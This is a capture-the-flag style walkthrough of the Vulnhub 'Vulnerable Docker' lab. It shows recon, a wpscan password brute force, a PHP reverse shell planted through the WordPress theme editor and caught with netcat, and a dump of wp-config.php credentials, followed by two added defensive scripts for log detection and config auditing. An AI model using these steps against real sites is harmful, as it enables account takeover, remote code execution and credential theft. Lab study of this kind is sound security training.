Vulnerable Docker Containment
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:b3:97:4a 1 60 PCS Systemtechnik GmbH
192.168.56.150 08:00:27:d5:51:8d 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.150.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-04 22:03 EDT
Nmap scan report for bogon (192.168.56.150)
Host is up (0.000089s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
8000/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: WordPress 4.8.1
|_http-title: NotSoEasy Docker – Just another WordPress site
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
MAC Address: 08:00:27:D5:51:8D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.41 seconds
Get Access
Browsing to port 8000 on the target host shows a WordPress site.
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ curl http://192.168.56.150:8000/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ nikto -h http://192.168.56.150:8000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.150
+ Target Hostname: 192.168.56.150
+ Target Port: 8000
+ Start Time: 2022-11-04 22:08:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Retrieved x-powered-by header: PHP/5.6.31
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.150/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
^C
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ gobuster dir -u http://192.168.56.150:8000 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.150:8000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/04 22:11:00 Starting gobuster in directory enumeration mode
===============================================================
/about (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/about/]
/contact (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/contact/]
/blog (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/blog/]
/home (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/home/]
/rss (Status: 200) [Size: 2402]
/login (Status: 302) [Size: 0] [--> http://192.168.56.150:8000/wp-login.php]
/0 (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/0/]
/feed (Status: 200) [Size: 17992]
/atom (Status: 200) [Size: 20055]
/s (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/sample-page/]
/b (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/blog/]
/a (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/a-homepage-section/]
/c (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/contact/]
/wp-content (Status: 301) [Size: 328] [--> http://192.168.56.150:8000/wp-content/]
/p (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/post-6/]
/admin (Status: 302) [Size: 0] [--> http://192.168.56.150:8000/wp-admin/]
/post (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/post-6/]
/h (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/2017/08/19/hello-world/]
/rss2 (Status: 200) [Size: 17992]
/wp-includes (Status: 301) [Size: 329] [--> http://192.168.56.150:8000/wp-includes/]
/page2 (Status: 200) [Size: 61436]
/bl (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/blog/]
/sa (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/sample-page/]
/rdf (Status: 200) [Size: 16332]
/page1 (Status: 200) [Size: 71444]
/sample (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/sample-page/]
/co (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/contact/]
/page3 (Status: 200) [Size: 61563]
/page4 (Status: 200) [Size: 61611]
/page5 (Status: 200) [Size: 61603]
/page6 (Status: 200) [Size: 61591]
/dashboard (Status: 302) [Size: 0] [--> http://192.168.56.150:8000/wp-admin/]
/he (Status: 301) [Size: 0] [--> http://192.168.56.150:8000/2017/08/19/hello-world/]
/page7 (Status: 200) [Size: 61591]
Progress: 3460 / 207644 (1.67%)^C
[!] Keyboard interrupt detected, terminating.
[ERROR] 2022/11/04 22:12:11 [!] context canceled
===============================================================
2022/11/04 22:12:11 Finished
===============================================================
Nothing especially useful so far. Since the Nmap results show that the target is running WordPress, the next step is to scan it with wpscan and see whether it has any vulnerabilities.
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ wpscan --url http://192.168.56.150:8000 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.150:8000/ [192.168.56.150]
[+] Started: Fri Nov 4 22:13:53 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.10 (Debian)
| - X-Powered-By: PHP/5.6.31
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.150:8000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.150:8000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.150:8000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.150:8000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.150:8000/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
| - http://192.168.56.150:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.150:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] bob
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.150:8000/wp-json/wp/v2/users/?per_page=100&page=1
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Nov 4 22:13:57 2022
[+] Requests Done: 62
[+] Cached Requests: 18
[+] Data Sent: 16.185 KB
[+] Data Received: 1.179 MB
[+] Memory used: 259.117 MB
[+] Elapsed time: 00:00:03
The user bob was identified; let's see whether wpscan itself can crack his password:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ wpscan --url http://192.168.56.150:8000 -U bob -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.150:8000/ [192.168.56.150]
[+] Started: Fri Nov 4 22:15:57 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.10 (Debian)
| - X-Powered-By: PHP/5.6.31
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.150:8000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.150:8000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.150:8000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.150:8000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.150:8000/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
| - http://192.168.56.150:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://192.168.56.150:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.150:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.1, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
Trying bob / Welcome1 Time: 00:08:19 <> (40397 / 14384792) 0.28% ETA: 49:18Trying bob / aaron5 Time: 00:08:19 <> (40400 / 14384792) 0.28% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: bob, Password: Welcome1
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Nov 4 22:24:23 2022
[+] Requests Done: 40542
[+] Cached Requests: 38
[+] Data Sent: 20.883 MB
[+] Data Received: 24.873 MB
[+] Memory used: 258.121 MB
[+] Elapsed time: 00:08:25
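From the defender's side, the 40,542 requests wpscan just made are easy to spot in the Apache access log of the WordPress container. The following is an added example, not part of the original write-up, that flags such bursts of login POSTs; the log lines, the one-minute window and the threshold are constructed assumptions.

```python
"""Detect WordPress credential brute-forcing in Apache access logs.

Added example (not from the original write-up). The log lines are constructed
to look like what the wpscan password attack above leaves behind in the Apache
access log of the WordPress container: a burst of POSTs to /wp-login.php from
one client, answered with 200 (form re-rendered with an error) until a single
302 marks an accepted login. Window and threshold values are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format; the request line is split into method and path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Endpoints that accept credentials. xmlrpc.php is included because wpscan
# (it reported XML-RPC as enabled above) can also submit logins through it.
AUTH_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop ?action=... query strings
    return rec


def find_bruteforce(lines, window=timedelta(minutes=1), threshold=20):
    """Return {ip: (attempts, first_ts, last_ts, success)} for every client whose
    POSTs to an auth endpoint exceed `threshold` inside some `window`.
    `success` is True if any of that client's auth POSTs got a 302 (login accepted)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in AUTH_PATHS:
            per_ip[rec["ip"]].append((rec["ts"], rec["status"]))

    findings = {}
    for ip, events in per_ip.items():
        events.sort()
        best, start = None, 0
        for end in range(len(events)):
            # advance the window start until the span fits inside `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count > threshold and (best is None or count > best[0]):
                best = (count, events[start][0], events[end][0])
        if best is not None:
            success = any(status == 302 for _, status in events)
            findings[ip] = (*best, success)
    return findings


def constructed_log():
    """Constructed sample: benign traffic plus a 30-request burst from
    192.168.56.137 (the Kali box in the write-up) within 30 seconds."""
    base = datetime(2022, 11, 5, 2, 16, 0, tzinfo=timezone.utc)
    ua = "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
    lines = [
        '192.168.56.1 - - [05/Nov/2022:02:15:30 +0000] "GET /about/ HTTP/1.1" 200 6120 "-" "Mozilla/5.0"',
        '192.168.56.1 - - [05/Nov/2022:02:15:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    ]
    for i in range(30):
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        status = 302 if i == 29 else 200  # the last guess is the accepted one
        lines.append(f'192.168.56.137 - - [{ts}] "POST /wp-login.php HTTP/1.1" {status} 3211 "-" "{ua}"')
    return lines


if __name__ == "__main__":
    for ip, (n, first, last, ok) in find_bruteforce(constructed_log()).items():
        print(f"{ip}: {n} login attempts between {first:%H:%M:%S} and {last:%H:%M:%S}; "
              f"login {'succeeded' if ok else 'did not succeed'}")
```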
Log in to the WordPress admin backend as the user (bob / Welcome1).
Next, a PHP reverse shell script needs to be uploaded to the target site, which can be done through the theme editor:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cp ~/Tools/php_reverse_shell/php-reverse-shell-1.0/php-reverse-shell.php .
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan php-reverse-shell.php
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ mv php-reverse-shell.php shell.php
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ vim shell.php
Appearance -> Editor -> 404 Template
Then paste the PHP shell code in place of the template contents and click Update File.
Visit the 404 page (to find its exact location, first view the homepage source and look for wp-content/themes/twentyseventeen; whether it is twentyseventeen or another theme depends on which theme the target site actually uses).
On Kali Linux, a shell on the target host is obtained:
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.150] 40990
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu SMP Tue Aug 8 11:40:23 UTC 2017 x86_64 GNU/Linux
02:42:12 up 43 min, 0 users, load average: 0.00, 0.11, 0.73
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
$ bash -i
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8f4bca8ef241:/$ pwd
pwd
/
www-data@8f4bca8ef241:/$
The shell prompt shows that the shell we currently have is inside a container.
www-data@8f4bca8ef241:/$ cd /var/www
cd /var/www
www-data@8f4bca8ef241:/var/www$ ls -alh
ls -alh
total 12K
drwxr-xr-x 4 root root 4.0K Jul 24 2017 .
drwxr-xr-x 33 root root 4.0K Aug 4 2017 ..
drwxr-xr-x 5 www-data www-data 4.0K Nov 5 01:58 html
www-data@8f4bca8ef241:/var/www$ cd html
cd html
www-data@8f4bca8ef241:/var/www/html$ ls -alh
ls -alh
total 204K
drwxr-xr-x 5 www-data www-data 4.0K Nov 5 01:58 .
drwxr-xr-x 4 root root 4.0K Jul 24 2017 ..
-rw-r--r-- 1 www-data www-data 235 Aug 19 2017 .htaccess
-rw-r--r-- 1 www-data www-data 418 Sep 25 2013 index.php
-rw-r--r-- 1 www-data www-data 20K Jan 2 2017 license.txt
-rw-r--r-- 1 www-data www-data 7.3K Dec 12 2016 readme.html
-rw-r--r-- 1 www-data www-data 5.4K Sep 27 2016 wp-activate.php
drwxr-xr-x 9 www-data www-data 4.0K Aug 2 2017 wp-admin
-rw-r--r-- 1 www-data www-data 364 Dec 19 2015 wp-blog-header.php
-rw-r--r-- 1 www-data www-data 1.6K Aug 29 2016 wp-comments-post.php
-rw-r--r-- 1 www-data www-data 2.7K Nov 5 01:58 wp-config-sample.php
-rw-r--r-- 1 root root 3.3K Nov 5 01:58 wp-config.php
drwxr-xr-x 6 www-data www-data 4.0K Nov 5 02:36 wp-content
-rw-r--r-- 1 www-data www-data 3.3K May 24 2015 wp-cron.php
drwxr-xr-x 18 www-data www-data 12K Aug 2 2017 wp-includes
-rw-r--r-- 1 www-data www-data 2.4K Nov 21 2016 wp-links-opml.php
-rw-r--r-- 1 www-data www-data 3.3K Oct 25 2016 wp-load.php
-rw-r--r-- 1 www-data www-data 34K May 12 2017 wp-login.php
-rw-r--r-- 1 www-data www-data 7.9K Jan 11 2017 wp-mail.php
-rw-r--r-- 1 www-data www-data 16K Apr 6 2017 wp-settings.php
-rw-r--r-- 1 www-data www-data 30K Jan 24 2017 wp-signup.php
-rw-r--r-- 1 www-data www-data 4.5K Oct 14 2016 wp-trackback.php
-rw-r--r-- 1 www-data www-data 3.0K Aug 31 2016 xmlrpc.php
www-data@8f4bca8ef241:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'wordpress');
/** MySQL database password */
define('DB_PASSWORD', 'WordPressISBest');
/** MySQL hostname */
define('DB_HOST', 'db:3306');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '853e970525ab9be27353b4e47e1c7ae74bad6edd');
define('SECURE_AUTH_KEY', 'db109c684d50566b803837fda86203730fb36cea');
define('LOGGED_IN_KEY', '8a0301ce6a8b14a1e15439c1e9cf9c791e5e9157');
define('NONCE_KEY', 'ff187d8251216e06badd61b867c83651c6214ec4');
define('AUTH_SALT', 'd2ca4470f040f6fc2e7336b2c1ea78eacfd6b305');
define('SECURE_AUTH_SALT', 'e35d8bd5577557d947c6e98c510107207d52941e');
define('LOGGED_IN_SALT', '733de3cb7cec9d21c9d77844bacadc1a098a15b4');
define('NONCE_SALT', 'f6af597be5e1f770dfaf3a68f91898b9aada2774');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
// If we're behind a proxy server and using HTTPS, we need to alert Wordpress of that fact
// see also http://codex.wordpress.org/Administration_Over_SSL#Using_a_Reverse_Proxy
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
$_SERVER['HTTPS'] = 'on';
}
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] );
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
www-data@8f4bca8ef241:/var/www/html$
This file contains the database username and password.
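For a defender, the interesting part of this file is what it does not set. The script below is an added example, not part of the original write-up: it audits a wp-config.php for the issues visible here (theme editor still enabled, world-readable credentials, short hex-only keys and salts); the severity labels and the 64-character key expectation are assumptions of the script.

```python
"""Audit a wp-config.php for the weaknesses this box exposes.

Added example, not part of the original write-up. It parses the define()
calls of a wp-config.php and reports what a defender would want fixed here:
the theme editor is still enabled (DISALLOW_FILE_EDIT unset, the path used
above to drop a PHP shell), the file holding DB_PASSWORD is world-readable
(it is root-owned 0644 in the listing above), and the keys/salts are short
hex strings rather than the 64-character random values the wordpress.org
generator emits. The 64-char expectation and the severities are assumptions.
"""
import os
import re
import stat

DEFINE_RE = re.compile(
    r"""define\(\s*['"](?P<name>[A-Z_]+)['"]\s*,\s*(?P<val>['"].*?['"]|true|false|[^)]+)\s*\)"""
)
SECRET_NAMES = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
                "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
PLACEHOLDER = "put your unique phrase here"  # value shipped in wp-config-sample.php


def parse_defines(src):
    """Map constant name -> value: quoted strings unquoted, true/false as bool,
    anything else (e.g. an expression using $_SERVER) kept as raw PHP text."""
    out = {}
    for m in DEFINE_RE.finditer(src):
        val = m.group("val").strip()
        if val in ("true", "false"):
            out[m.group("name")] = val == "true"
        elif len(val) >= 2 and val[0] in "'\"" and val[-1] == val[0]:
            out[m.group("name")] = val[1:-1]
        else:
            out[m.group("name")] = val
    return out


def audit(src, mode=None):
    """Return [(severity, message)] for config text `src`; `mode` is the file's
    st_mode when known, so the permission bits can be checked as well."""
    cfg = parse_defines(src)
    findings = []
    if cfg.get("DISALLOW_FILE_EDIT") is not True:
        findings.append(("high", "DISALLOW_FILE_EDIT not set: any admin can write PHP through the theme/plugin editor"))
    if cfg.get("DISALLOW_FILE_MODS") is not True:
        findings.append(("medium", "DISALLOW_FILE_MODS not set: plugin/theme uploads allowed from the dashboard"))
    if cfg.get("WP_DEBUG") is True:
        findings.append(("low", "WP_DEBUG enabled: PHP notices may leak paths to visitors"))
    for name in SECRET_NAMES:
        value = cfg.get(name, "")
        if not isinstance(value, str) or not value or value == PLACEHOLDER:
            findings.append(("high", f"{name} is missing or still the sample placeholder"))
        elif len(value) < 64 or re.fullmatch(r"[0-9a-f]+", value):
            findings.append(("medium", f"{name} is short or hex-only ({len(value)} chars); regenerate it"))
    if len({cfg.get(n) for n in SECRET_NAMES}) < len(SECRET_NAMES):
        findings.append(("high", "some keys/salts are duplicated"))
    if mode is not None and mode & stat.S_IROTH:
        findings.append(("high", "wp-config.php is world-readable: DB_PASSWORD is exposed to every local user"))
    for name in ("WP_SITEURL", "WP_HOME"):
        if "$_SERVER['HTTP_HOST']" in str(cfg.get(name, "")):
            findings.append(("medium", f"{name} is derived from the client-controlled Host header"))
    return findings


def audit_file(path):
    """Audit a wp-config.php on disk, including its permission bits."""
    with open(path, encoding="utf-8") as fh:
        return audit(fh.read(), os.stat(path).st_mode)


# Constructed sample built from the defines shown in the write-up above.
SAMPLE = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'WordPressISBest');
define('DB_HOST', 'db:3306');
define('AUTH_KEY', '853e970525ab9be27353b4e47e1c7ae74bad6edd');
define('SECURE_AUTH_KEY', 'db109c684d50566b803837fda86203730fb36cea');
define('LOGGED_IN_KEY', '8a0301ce6a8b14a1e15439c1e9cf9c791e5e9157');
define('NONCE_KEY', 'ff187d8251216e06badd61b867c83651c6214ec4');
define('AUTH_SALT', 'd2ca4470f040f6fc2e7336b2c1ea78eacfd6b305');
define('SECURE_AUTH_SALT', 'e35d8bd5577557d947c6e98c510107207d52941e');
define('LOGGED_IN_SALT', '733de3cb7cec9d21c9d77844bacadc1a098a15b4');
define('NONCE_SALT', 'f6af597be5e1f770dfaf3a68f91898b9aada2774');
define('WP_DEBUG', false);
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] );
"""

if __name__ == "__main__":
    for severity, message in audit(SAMPLE, mode=0o100644):  # -rw-r--r-- as in the listing
        print(f"[{severity}] {message}")
```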
